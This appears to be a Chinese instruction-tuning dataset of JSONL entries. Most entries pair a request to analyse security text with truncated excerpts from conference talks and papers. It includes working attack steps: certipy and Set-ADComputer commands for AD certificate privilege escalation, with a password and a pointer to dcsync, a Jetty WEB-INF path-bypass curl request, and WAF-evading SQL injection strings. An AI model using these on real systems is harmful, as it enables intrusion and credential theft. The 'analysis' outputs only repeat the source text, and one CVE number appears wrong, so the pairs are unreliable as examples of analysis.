'Password1@' 靶场给的目标连接DC的方法是ssh上去用的普通域用户域用户不能直接登录DC通过ssh或者其他的服务可以 获取添加的机器用户信息 Get-ADComputer THMPC -properties DNSHostName,ServicePrincipalName 2022/5/16 05:03 Evernote Export file:///C:/Users/jiushi/Desktop/Active Directory 域权限提升漏洞(CVE-2022-26963)漏洞复现.html 3/7 清除SPN修改DNSHostName否则添加DNSHostName出现以下错误 Set-ADComputer THMPC -ServicePrincipalName @{} Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com 利用修改DNSHostName后的机器账户去申请证书并获取Ntlm certipy req 'lunar.eruca.com/THMPC$:Password1@'@lundc.eruca.com -ca LUNAR-LUNDC-CA -template Machine certipy auth -pfx 'lundc.pfx' 2022/5/16 05:03 Evernote Export file:///C:/Users/jiushi/Desktop/Active Directory 域权限提升漏洞(CVE-2022-26963)漏洞复现.html 4/7 剩下的就是dcsync了 记录遇到的其他问题 CA服务器主机名不对时候利用certipy请求将出", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOutline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Meddle: Framework for piggy-back fuzzing and tool development Geo McDonald glmcdona@gmail.com, unaffiliated presentation August 8, 2014 DEF CON 22 GeoMcDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion 1. Background About Me Fuzzing File Format Fuzzing Protocol Fuzzing 2. Meddle Framework Introduction Meddle Target Meddle Process Meddle Controller 3. XRDP Fuzzing XRDP Server 4. DeviceIoControl DeviceIoControl Demo 5. Sandbox Malware Sandbox Demo 6. Conclusion GeoMcDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion About Me About Me Vancouver, Canada Game hacking (Ultima Online MMORPG) Reverse-engineering tool developer Previously Symantec Currently at Microsoft Personal website http://www.split-code.com/ GeoMcDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Fuzzing Types of Fuzzing File Format Fuzzing PDF, Microsoft Word, or TrueType fonts Protocol Fuzzing RDP, VNC, SSL, or Voip Application Fuzzing COM objects, API calls, or inter-process communication Web Application Fuzzing Joomla, WordPress, or any website GeoMcDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back fuzzing and tool development Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Fuzzing Fuzzing Tools SPIKE from Immunity [1] Network protocols and web applications Basic Fuzzing Framework (BFF) from CERT [2] File format SAGE from Microsoft [3] Input fuzzing AutoFuzz [4] Network protocols by MITM COMRaider [5] COM interface fuzz", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n惡意程式分析組 病毒不再神秘 - 讓我們支解惡意行為 HITCON GIRLS 資安女孩 HITCON GIRLS 由一群對資安有興趣想學習更多技術的女孩們 所組成 讀書會 我們分成不同的組別進行討論學習和互補 惡意程式分析組針對 Malware 進行分析內容 其中包含各種動態工具以及反組譯的討論 成員介紹 Turkey 台灣駭客協會 秘書 唯一的台灣駭客協會正職XD 珣珣 輔仁大學資訊工程所 碩一 NISRA 成員 成員 成員介紹 Joey 台灣科技大學 資訊管理所 Lucas 任職於趨勢科技 Charles 任職於Team T5 教練 資安學習地圖 資訊收集 Information Gathering 網路安全 Network Security 網站與網頁應用程式安全 Web Security 系統安全 System Security 加密與解密 Cryptography 惡意程式檢測 Malware Detection 逆向工程 Reversing Engineering 數位鑑識 Digital Forensics 行動裝置 Mobile Devices 資安學習地圖 數位鑑識 Digital Forensics 覺得家裡好像有被侵入過於是做一些檢查 惡意程式檢測 Malware Detection 廚房地板上發現一顆炸彈移動到安全環境做檢驗 逆向工程 Reversing Engineering 理解運作原理威脅性反向尋找兇手 學習框架 惡意程式淺談 何謂惡意程式 手動分析從三大層面來分析惡意程式 RegistryProcess網路 工具介紹 自動分析SandBox介紹 逆向工程 組別定位 電腦好像怪怪的.. 1.警覺 2.檢查 不好意思 只是錯覺XD 發現惡意程式 3.分析 怎麼進來 惡意行為 危害程度 災害回復 組別定位 電腦好像怪怪的.. 1.警覺 2.檢查 不好意思 只是錯覺XD 發現惡意程式 3.分析 怎麼進來 惡意行為 危害程度 災害回復 惡意程式淺談 何謂惡意程式(Malware) 定義 蓄意撰寫來破壞電子裝置或竊取資料的程式 何謂惡意程式(Malware) 條件特徵 強行安裝 抵制移除 強行彈出廣告 干擾佔用系統資源 停用防毒軟體或其他電腦管 理程式來做進一步的破壞 強行修改使用者軟體設定 非允許之下紀錄使用者資訊 與電腦病毒聯合侵入用戶電腦  何謂惡意程式(Malware) Grayware 的存在 具備下列特徵的應用程式 具有擾人的行為模式 令人排斥 令人難以察覺 介於好軟體與壞病毒的灰色地帶 就跟槍一樣拿來打壞人就是伸張正義拿來打好人就是惡意 手動分析 從三大層面來分析惡意程式 惡意程式分析的層面 Registry Key Process 網路連線 惡意程式分析的層面 Registry Key  使用工具AutoRuns Process 網路連線 惡意程式為了隨系統自動啟動會在 Registry建立啟動項 Registry小知識 用於儲存系統和應用程式的設計資訊 惡意程式的分析- Registry Key 前備小知識 - Registry 登錄檔/註冊表 惡意程式為了隨系統自動啟動會在 Registry建立啟動項 Registry小知識 用於儲存系統和應用程式的設計資訊 C:\\Windows\\regedit.exe 前備小知識 - 啟動項 每次開機就會有一個人自動出現準備做事 這就是啟動項 Registry 中開機先執行的項目就是啟動項 HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 使用者一登入該程式就自動執行 前備小知識 - 啟動項 惡意程式分析的層面 Registry Key Process  使用工具ProcessExplorer 網路連線 前備小知識 - Process 觸發程式  被載入記憶體  產生程序了 程序 (process) 可以說就是一個正在運作中的程式 分析惡意程式工具 - ProcessExplorer ProcessExplorer - 記憶體中在執行的所有程 序及其目錄 作用類似於工作管理員優點在於可以顯示 程序所連結的動態連結資料庫(DLL)檔達 到觀察的方便性 惡意程式分析的層面 Registry Key Process 網路連線  使用工具TCPView 分析惡意程式工具 - TCPView TCPView - 記錄對外連線 顯示連線記錄每筆連線記錄是由哪支程式 造成的 小節 Registry Key  使用工具AutoRuns Process  使用工具ProcessExplorer 網路連線  使用工具TCPView 自動分析 從三大層面來分析惡意程式 線上的自動分析網站 線上 SandBox Virus", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInvisible Finger: Practical Electromagnetic Interference Attack on Touchscreen-based Electronic Devices Haoqi Shan, Boyi Zhang, Zihao Zhan, Dean Sullivan, Shuo Wang, Yier Jin University of Florida {haoqi.shan, zby0070, zhan.zihao}@ufl.edu, {shuo.wang, yier.jin}@ece.ufl.edu University of New Hampshire {dean.sullivan}@unh.edu AbstractÐTouchscreen-based electronic devices such as smart phones and smart tablets are widely used in our daily life. While the security of electronic devices have been heavily investigated recently, the resilience of touchscreens against various attacks has yet to be thoroughly investigated. In this paper, for the first time, we show that touchscreen-based electronic devices are vulnerable to intentional electromagnetic interference (IEMI) attacks in a systematic way and how to conduct this attack in a practical way. Our contribution lies in not just demonstrating the attack, but also analyzing and quantifying the underlying mechanism allowing the novel IEMI attack on touchscreens in detail. We show how to calculate both the minimum amount of electric field and signal frequency required to induce touchscreen ghost touches. We further analyze our IEMI attack on real touchscreens with different magnitudes, frequencies, duration, and multitouch patterns. The mechanism of controlling the touchscreen-enabled electronic devices with IEMI signals is also elaborated. We design and evaluate an out-of-sight touchscreen locator and touch injection feedback mechanism to assist a practical IEMI attack. Our attack works directly on the touchscreen circuit regardless of the touchscreen scanning mechanism or operating system. Our attack can inject short-tap, long-press, and omni- directional gestures on touchscreens from a distance larger than the average thickness of common tabletops. Compared with the state-of-the-art touchscreen attack, ours can accurately inject different types of touch events without the need for sensing signal synchronization, which mak", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvolving Exploits through Genetic Algorithms By soen Who am I ! CTF Player ! Programmer ! Virus / Worm Aficionado ! Computer Scientist ! Penetration Tester in daylight Exploiting Web Applications ! Attack problems ! Driven by customer ! Small scope ! Limited time ! Report driven ! Attack methodology Exploiting Web Applications ! Attack problems ! Attack methodology ! Run as many scanning tools as possible ! Manually poke at suspicious areas until a vulnerability is found ! Write an exploit Exploiting Web Applications ! Attack problems ! Attack methodology ! Problems with this ! Manual code coverage is inherently small ! Manual inspection of suspicious areas is time-costly ! Manual exploit development takes time Existing tools for exploit discovery / development ! Nessus / nmap / blind elephant / other scanning tools dont really count because they rely upon a signature developed for a specific vulnerability / finding. ! Acunetix ! Burp ! ZAP ! sqlmap Foundational problems with current scanning techniques ! Systemic signature problem ! Web Scanners == Anti-Virus ! Solution: Evolve unique exploits for web applications ! Web Application Firewall blocks or 1=1 -- ? EVOLVE  or 1=1; -- Aso1239;or 2=1 or 1=3 or 1=1 --asdl1ojcud// Covered in this talk ! Genetic algorithms to create exploits ! SQL injection (MySQL, SQL, MSSQL, Oracle) ! Command injection (Bash, CMD, PHP, Python) ! Attack surface is HTTP / HTTPS POST and GET parameters ! What we will not cover ! Everything else Genetic Exploit Development ! Forced Evolution ! github.com/soen-vanned/forced-evolution Evolutionary Algorithms 1. Create a large number of exploit strings 2. While solution/goal != found: 1. Score all of the strings performance using a fitness function 2. Cull the weak performing 3. Breed the strong performing 4. Mutate the strings randomly 3. Display the exploit string that solved the solution Forced Evolution 1. Create a large number of pseudo-random strings 2. While exploit != successful: 1. Send t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGSM: WE CAN HEAR EVERYONE NOW! DEFCON 2019 Campbell Murray, Eoin Buckley James Kulikowski, Bartek Piekarski BlackBerry  2018 BlackBerry. All Rights Reserved. 2 AGENDA  Slides detail a key vulnerability in GSM.  Highlights derivation of indicator to exploit this vulnerability.  Section 1: Concept Overview  Section 2: Attack Mechanics  Section 3: Demonstration  Section 4: Cellular Security Discussion  Section 5: Q & A Concept Overview  2018 BlackBerry. All Rights Reserved. 4 Concept Overview  GSM background  Concept for GSM (digital) started in the late 1980s  Major improvement over AMPS (analogue)  GSM Security has several design issues  Support for key sizes <= 64 bits  Encrypted data contains redundancy  Error control coding before ciphering  2018 BlackBerry. All Rights Reserved. 5 Concept Overview Message Error Control Codeword Cipherstream Cipher A5/1 Ciphertext  Typical GSM Channel Structure  Encryption with A5/1  Key maximum 64 bits length  Convolutional error control code  Intended to combat noise from wireless channel  Attack uses code to identify cipherstream noise Convolutional code  2018 BlackBerry. All Rights Reserved. 6 Concept Overview Message Error Control Codeword Cipherstream Cipher A5/1 Ciphertext  High level view of attack  Capture GSM frame  Compute a cipherstream/key indicator  Use convolutional code parameters  Use indicator with a Rainbow table to identify ciphering key  Use indicator as a fingerprint for ciphering key Convolutional code Attack Mechanics  2018 BlackBerry. All Rights Reserved. 8 Attack Mechanics Message (184 bits) Conv. Codeword (456 bits) Cipherstream (456 bits) Cipher A5/1 Ciphertext (456 bits)  Demonstration uses SACCH control channel  Compromise of SACCH also compromises voice (same key)  Works for any SACCH message  Indicator/fingerprint is independent of the message  Knowledge of plaintext is not needed Convolutional code SACCH FIRE code (224 bits)  2018 BlackBerry. All Rights Reserved. 9 Attack Mechanics  Indicator comput", "category": "text_analysis", "source": "security_papers"}
{"instruction": "什么是SQL注入攻击？", "input": "", "output": "SQL注入攻击是一种代码注入技术，攻击者通过在应用程序的输入字段中插入恶意SQL代码，来操纵后端数据库执行非预期的命令。常见的防护措施包括：1. 使用参数化查询 2. 输入验证和过滤 3. 最小权限原则 4. 使用存储过程", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCSRF Bouncing By Michael Brooks What? This is an advanced talk on exploit chaning and CSRF. This will detail the process I used for finding and writing an exploit chain against a real world application. This will also discuess using JavaScript to locate targets to attack. Prerequsite You must already know how to exploit Cross Site Scripting and Cross Site Request Forgeries. How Session IDs are used. The Same Origin Policy. Usual CSRF Most CSRF makes use of Existing Functionatliy. An Example is my exploit to change the system's root password using cPanel WebHost Manager v3.1.0 (2008) Got root? Usual CSRF How I Sea-Surfed on the Motorola Surfboard Cable Modem: Restores factory default which will DoS the modem for 5-30 minuets Surface Area and CSRF Large parts of a Web Application can exist in a Password Protected area. This password protected area can and will suffer from vulnerabilities. XSS SQL Injection By sending malformed requests with CSRF its possible to gain access to new attack surfaces. Thoughts of Devlopers Why spend time validating the input of someone I trust? A password is required, that should be enough to keep out an attacker! Thoughts of Hackers Why should I look for a flaw that I can't exploit? Thoughts of Users Baa Baa Discovery First Steps Pre-Scan Wapiti Results The Application We will be hacking TBDev which is a Popular Private Torrent tracker software. These communities are secretive because they are breaking the law. If they get hacked, they can't go to the authorities. War Room I do all of my auditing in a Virtual Machine. I do not expose my work station to attack If I damage the machine with a test I can easily use a copy. Run multiple copies of a VM and tests at the same time. First Steps Install TBDev. Create an administrative account Make sure display_errors=On in your php.ini . Wapiti reads error messages for the discovery of some flaws. (Not XSS) Attack Spider I used the web application Attack Spider Wapiti: http://wapiti.sourceforge.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows Process Injection in 2019 Amit Klein, Itzik Kotler Safebreach Labs Introduction Process injection in Windows appears to be a well-researched topic, with many techniques now known and implemented to inject from one process to the other. Process injection is used by malware to gain more stealth (e.g. run malicious logic in a legitimate process) and to bypass security products (e.g. AV, DLP and personal firewall solutions) by injecting code that performs sensitive operations (e.g. network access) to a process which is privileged to do so. In late 2018, we decided to take a closer look at process injection in Windows. Part of our research effort was to understand the landscape, with a focus on present-day platforms (Windows 10 x64 1803+, 64-bit processes), and there we came across several problems:  We could not find a single location with a full list of all injection techniques. There are some texts that review multiple injection techniques (hat tip to Ashkan Hosseini, EndGame for a nice collection https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques- technical-survey-common-and-trending-process and to Csaba Fitzl AKA TheEvilBit for some implementations https://github.com/theevilbit/injection), but theyre all very far from capturing all (or almost all) techniques.  The texts that describe injection techniques typically lump together true injection techniques (the object of this paper) with other related topics, such as process hollowing and stealthy process spawning. In this paper, were interested only in injection from one 64-bit process (medium integrity) to another, already running 64-bit process (medium integrity).  The texts often try to present a complete injection process, therefore mixing writing and execution techniques, when only one of them is novel.  Many texts target 32-bit processes, and it was not clear whether they apply to 64-bit processes.  Many texts target pre-Windows 10 platforms, and it is not clear whether they app", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Android UI automation test Automatic Android GUI Traversal with High Coverage IEEE2014</br> Targeted and depth-first exploration for systematic testing of android apps OOPSLA2013</br> Automated testing with targeted event sequence generation ISSTA2013</br> Automatic and scalable fault detection for mobile applications Mobisys2014</br> Mobiguitar - a Tool for Automated Model-based Testing of Mobile Apps 2014</br> DynaDroid : dynamic binary instrumentation based app behavior monitor SIN 2015</br> Mining Android App Usages for Generating Actionable GUI-Based Execution Scenarios MSR2015</br> Sapienz : multi-objective automated testing for Android applications ISSTA 2016</br> Automated Test Input Generation for Android : Are We There Yet ASE2015 </br> PUMA: Programmable UI-Automation for Large Scale Dynamic Analysis of Mobile Apps</br> AppsPlayground: Automatic Security Analysis of Smartphone Applications CODASPY2013</br> Are these Ads Safe: Detecting Hidden Attacks through the Mobile App-Web Interfaces NDSS 2016</br> SmartDroid: an Automatic System for Revealing UI-based Trigger Conditions in Android Applications SPSM 2012</br> ## Android SSL Security Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security CCS 2012</br> Rethinking SSL Development in an Appified World CCS 2013</br> SMV-HUNTER: Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in Android Apps NDSS 2014</br> To Pin or Not to PinHelping App Developers Bullet Proof Their TLS Connections USENIX 2015</br> CertShim: Securing SSL Certificate Verification through Dynamic Linking 2014</br> SSLINT: A Tool for Detecting TLS Certificate Validation Vulnerabilities 2016</br> Automatically Detecting SSL Error-Handling Vulnerabilities in Hybrid Mobile Web Apps ASIA CCS 2015</br> Danger is My Middle Name: Experimenting with SSL Vulnerabilities in Android Apps WISEC 2015</br> Using Frankencerts for Automated Adversarial Testing of Certificate Validation in SSL/TLS Implementa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Miranda categories: Information Gathering tags: [kali linux,information gathering,UPNP] date: 2020-11-19 11:10:00 --- ## Miranda包说明 Miranda 是一个基于 Python 的 UPNP 即插即用的客户端应用其旨在发现查询和与 UPNP 型设备交互特别是互联网网关设备又称路由器它可用于审核网络上启用了 UPNP 设备是否存在漏洞它的功能包括 - 支持选项补全和命令历史记录的交互 Shell - 被动和主动发现 UPNP 型设备 - 可自定义的搜索引擎查询查询特定设备或服务 - 完全控制应用程序设置比如 IP 地址端口和消息头 - 简单枚举 UPNP 设备服务操作和变量 - 输入/输出状态变量与服务操作的关联 - 能够向 UPNP 服务/设备发送操作 - 能够将数据保存到文件中以便以后进行分析和协作 - 命令记录 Miranda建立在Linux系统上并用于Linux系统并且已经在具有Python 2.5的Linux 2.6内核上进行了测试但是由于它是用Python编写的因此大多数功能应可用于任何受Python支持的平台Miranda已针对LinksysD-LinkBelkin 和 ActionTec 等多家供应商的IGD交互式图形设计系统进行了测试默认情况下所有Python模块均已安装在Linux Mint 5Ubuntu 8.04测试系统上 源码: https://code.google.com/p/mirandaupnptool/ [Miranda 主页](http://code.google.com/p/mirandaupnptool/) | [Kali Miranda Repo](https://gitlab.com/kalilinux/packages/miranda) - 作者克雷格赫夫纳Craig Heffner - 许可证MIT ### Miranda 软件包中包含的工具 ##### miranda  UPNP 管理员工具 ```shell root@kali:~# miranda -h 命令行用法: /usr/bin/miranda [选项] -s <结构文件> 从结构文件加载以前的主机数据 -l <日志文件> 记录用户提供的命令到日志文件 -i <接口> 指定要使用的接口的名称仅Linux需要root -u 禁用 show-uniq-hosts-only 选项 -d 启用调试模式 -v 启用详细模式 -h 显示帮助 ``` ### miranda 用法示例 在接口 eth0 ***-i eth0*** 上启动以详细模式 ***-v***然后启动发现模式 ***msearch*** ```shell root@kali:~# miranda -i eth0 -v 绑定到接口 eth0 ... 启用详细模式 upnp> msearch 进入'upnp:rootdevice'的发现模式 , 按 Ctl+C 停止... **************************************************************** 来自192.168.1.230:80的SSDP简单服务发现协议通知消息 XML 文件位于 http://192.168.1.230:80/description.xml 设备正在运行 FreeRTOS/6.0.5, UPnP/1.0, IpBridge/0.1 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jetty Ambiguous Paths Information Disclosure Vulnerability (CVE-2021-28164) [中文版本(Chinese version)](README.zh-cn.md) Eclipse Jetty is a Java web server and Java Servlet container. Jetty release 9.4.37 introduced a more precise implementation of RFC3986 with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the WEB-INF directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This bug is fixed on version 9.4.39. Reference links. - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://xz.aliyun.com/t/10039 ## Vulnerable Application Execute the following command to start a Jetty 9.4.37 server. ``` docker compose up -d ``` After the server starts, visit ``http://your-ip:8080`` to see an example page. ## Exploit The sensitive file web.xml is not accessible through `/WEB-INF/web.xml`. ![](1.png) Use `%2e/` to bypass the restriction: ``` curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml' ``` ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeacon Object Files A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post- exploitation features. 信标对象文件BOF是一个已编译的 C 程序按照约定编写使它可以在信 标进程中执行并使用内部信标 API BOF 是一种利用新的后开发功能快速扩 展 Beacon 代理的方法 What are the advantages of BOFs? One of the key roles of an command&control platform is to provide ways to use external post-exploitation functionality. Cobalt Strike already has tools to use PowerShell, .NET, and Reflective DLLs. These tools rely on an OPSEC expensive fork&run pattern that involves a process create and injection for each post-exploitation action. BOFs have a lighter footprint. They run inside of a Beacon process and are cleaned up after the capability is done. 命令与控制平台的关键作用之一是提供使用外部开发后功能的方法 Cobalt Strike 已经具有使用 PowerShell.NET 和 Reflective DLL 的工具 这些工具 依赖于 OPSEC 昂贵的分叉运行模式该模式涉及针对每个开采后行动的过程 创建和注入 转炉的占地面积较小 它们在 Beacon 进程内部运行并在功 能完成后清除 BOFs are also very small. A UAC bypass privilege escalation Reflective DLL implementation may weigh in at 100KB+. The same exploit, built as a BOF, is <3KB. This can make a big difference when using bandwidth constrained channels, such as DNS. BOF 也很小 一个 UAC 绕过特权升级 Reflective DLL 实现的大小可能超过 100KB 建立为 BOF 的相同漏洞利用程序不到 3KB 当使用带宽受限的通 道例如 DNS时这可能会有很大的不同 Finally, BOFs are easy to develop. You just need a Win32 C compiler and a command line. Both MinGW and Microsoft's C compiler can produce BOF files. You don't have to fuss with project settings that are sometimes more effort than the code itself. 最后转炉很容易开发 您只需要一个 Win32 C 编译器和一个命令行 MinGW 和 Microsoft 的 C 编译器都可以生成 BOF 文件 您不必大惊小怪的项 目设置有时比代码本身还要费劲 How do BOFs work? To Beacon, a BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs. 对于 Beacon 而言BOF 只是位置无关的代码块它接收指向某些 Beacon 内 部 API 的指针 To Cobalt Strike, a BOF is an object file produced by a C compiler. Cobalt Strike parses this file and acts as a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGo Go Gadget Python Nick Waite Furkan Cayçı Hardware for software people  Gadgets are cool  Writing drivers is not so easy  Usually done in C  Requires knowledge of low-level interfaces  Can easily crash your box  Many devices do not need compiled drivers  Low data rates  libUSB and other abstraction layers  Is there a way to rapid prototype drivers?  Fast, easy, fun  Cross-platform would be nice Python  A very handy scripting language  Modules for almost everything  Even hardware  Pyserial  Pyparallel  PyUSB  Looks like a winner! Todays Menu USB Serial The Serial Port  Electrical  Full-duplex  Hardware flow control (often not used)  [0] + [n]*n_bits + [1]  0 = -3 to -15 volts, 1= 3 to 15 volts  Mechanical  DB-25, DE-9  Often a USB device pretending to be serial port Handshaking and cables  Will add graphics later  Much of the confusion in serial land revolves around flow control and what kind to use  True hardware flow control  Fake local loopback flow control  Software flow control (XON/XOFF)  No flow control (most common nowadays)  DCE/DTE  which side are you?  Null modem cables Serial in python  Its easy (mostly)  There are some gotchas, however >>> import serial >>> s = serial.Serial('/dev/ttyS1', 9600) >>> s.write(\"hello\") >>> print s.readline() >>> s.close() On actually using pySerial  There are subtle issues with pyserials use in robust driver code  Timeouts  Flow control  Buffering  Alternating reads & writes  Flush ports!  TO BE COMPLETED LATER Actual gadgets  Demo showing actual code  Demo sniffing serial transactions with special cable? USB  A great example of a forward looking standard  Since 1996, still backward compatible!  Really is the universal bus  Ever seen a PS/2 fondue pot?  mmmm.cheese  Practically, most cool gadgets you will want to reverse-engineer are USB  Many will be HID-class USB made complicated  A Device has  Configuration(s) which have  Interface(s), which have  Endpoint(s)  Or, theres HID  Decisions, decisions USB made simple  Real U", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Google Reimagined a Phone. Its Our Job to Red Team & Secure it Xuan Xing Eugene Rodionov Christopher Cole Farzan Karimi #BHUSA @BlackHatEvents Information Classification: General  Who We Are  Whats Our Scope  How We Help Secure Android & Pixel  Pixel 6 Attack Surface  Proof of Concept Deep Dives  Titan M2  Android Bootloader  Concluding Thoughts Agenda Agenda [Everything in this presentation has been fixed] #BHUSA @BlackHatEvents Who We Are #BHUSA @BlackHatEvents Information Classification: General Mission We are the eyes of Android Security: Increase Pixel and Android security by attacking key components and features, identifying critical vulnerabilities before adversaries Offensive Security Reviews to verify (break) security assumptions Scale through tool development (e.g. continuous fuzzing) Android Red Team Develop PoCs to demonstrate real-world impact We hack ourselves to make it harder for others! Assess the efficacy of security mitigations #BHUSA @BlackHatEvents Information Classification: General Whats Our Scope? #BHUSA @BlackHatEvents Information Classification: General Robust Development Practices Compiler Mitigations New Platform Mitigations Vulnerability Reward Programs Hardware Architecture Reviews Threat Modeling Red Team How Do We Secure Android & Pixel? External Security Reviews You! #BHUSA @BlackHatEvents Information Classification: General Fuzzing Host-based Fuzzing On-device Fuzzing Static Analysis Dynamic Analysis (Services) Variant Analysis Formal Verification Manual Code Review Web/Mobile Network TitanM Red Team Attack Approaches #BHUSA @BlackHatEvents Pixel Hardware Journey #BHUSA @BlackHatEvents Information Classification: General Pixel 1 Pixel as a reference device Pixel 2 Building our own Camera chip Pixel 4 Custom Dedicated Hardware Pixel 6 Security Re-imagined Google Tensor & Titan M2 Pixel 5 Pixel Hardware Journey Pixel 3 Custom Titan Security Chip External Certification (CC MDF) #BHUSA @BlackHatEvents Information ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 更新日志 --- <center><h1>CF 更新日志</h1></center> ## [v0.5.0](https://github.com/teamssix/cf/releases/tag/v0.5.0) 2023.7.1 ### 新增功能 * [#227](https://github.com/teamssix/cf/pull/227) 新增阿里云用户数据后门功能 * [#228](https://github.com/teamssix/cf/pull/228) 新增阿里云镜像共享功能 * [#231](https://github.com/teamssix/cf/pull/231) 新增阿里云接管控制台时自动创建 AK 功能 * [#235](https://github.com/teamssix/cf/pull/235) 新增阿里云 RDS 列出详细信息功能 * [#235](https://github.com/teamssix/cf/pull/235) 新增阿里云 RDS 添加账号功能 * [#235](https://github.com/teamssix/cf/pull/235) 新增阿里云 RDS 创建公网访问地址的功能 * [#235](https://github.com/teamssix/cf/pull/235) 新增阿里云 RDS 添加白名单的功能 * [#238](https://github.com/teamssix/cf/pull/238) [#239](https://github.com/teamssix/cf/pull/239) 新增查询 AK 所属云厂商功能 * [#251](https://github.com/teamssix/cf/pull/251) 新增支持 brew 安装 ### 功能优化 * [#243](https://github.com/teamssix/cf/pull/243) 优化配置功能现在能自动识别配置是否处于可用状态 * [#245](https://github.com/teamssix/cf/pull/245) 优化实例公网 IP 展示不存在时会展示为空 * [#246](https://github.com/teamssix/cf/pull/246) 优化 OSS 下载功能现在默认会下载所有文件 * [#248](https://github.com/teamssix/cf/pull/248) 优化更新处理逻辑 * [#249](https://github.com/teamssix/cf/pull/249) 优化华为云 OBS 列出功能 ### Bug 修复 * [#244](https://github.com/teamssix/cf/pull/244) 修复批量执行命令时没有安装云助手导致批量执行中断的 Bug * [#247](https://github.com/teamssix/cf/pull/247) 修复 OSS 下载文件无法自动创建目录的 Bug ## [v0.4.5](https://github.com/teamssix/cf/releases/tag/v0.4.5) 2023.4.29 ### 新增功能 * [#221](https://github.com/teamssix/cf/pull/221) 增加华为云控制台接管和权限枚举功能 ### 功能优化 * [#220](https://github.com/teamssix/cf/pull/220) 优化错误信息输出 * [#225](https://github.com/teamssix/cf/pull/225) 优化更新功能 ### Bug 修复 * [#201](https://github.com/teamssix/cf/pull/201) 修复配置令牌功能的 Bug * [#203](https://github.com/teamssix/cf/pull/203) [#204](https://github.com/teamssix/cf/pull/204) 修复两处缓存功能的 Bug * [#208](https://github.com/teamssix/cf/pull/208) 修复更新功能 Bug * [#224](https://github.com/teamssix/cf/pull/224) 修复腾讯云 cvm 和 lh 无法列全的 Bug ## [v0.4.4](https://github.com/teamssix/cf/releases/tag/v0.4.4) 2022.12.13 ### 新增功能 * [#196](ht", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSummary of Attacks Against BIOS and Secure Boot Yuriy Bulygin, John Loucaides, Andrew Furtak, Oleksandr Bazhaniuk, Alexander Matrosov Intel Security In The Beginning Was The Legacy BIOS.. Legacy BIOS 1. CPU Reset vector in BIOS ROM (Boot Block)  2. Basic CPU, chipset initialization  3. Initialize Cache-as-RAM, load and run from cache  4. Initialize DIMMs, create address map..  5. Enumerate PCIe devices..  6. Execute Option ROMs on expansion cards  7. Load and execute MBR  8. 2nd Stage Boot Loader  OS Loader  OS kernel Also Technical Note: UEFI BIOS vs. Legacy BIOS, Advantech Then World Moved to UEFI.. UEFI Boot From Secure Boot, Network Boot, Verified Boot, oh my and almost every publication on UEFI UEFI [Compliant] Firmware SEC Pre-EFI Init (PEI) Driver Exec Env (DXE) Boot Dev Select (BDS) Runtime / OS S-CRTM; Init caches/MTRRs; Cache-as-RAM (NEM); Recovery; TPM Init S-CRTM: Measure DXE/BDS Early CPU/PCH Init Memory (DIMMs, DRAM) Init, SMM Init Continue initialization of platform & devices Enum FV, dispatch drivers (network, I/O, service..) Produce Boot and 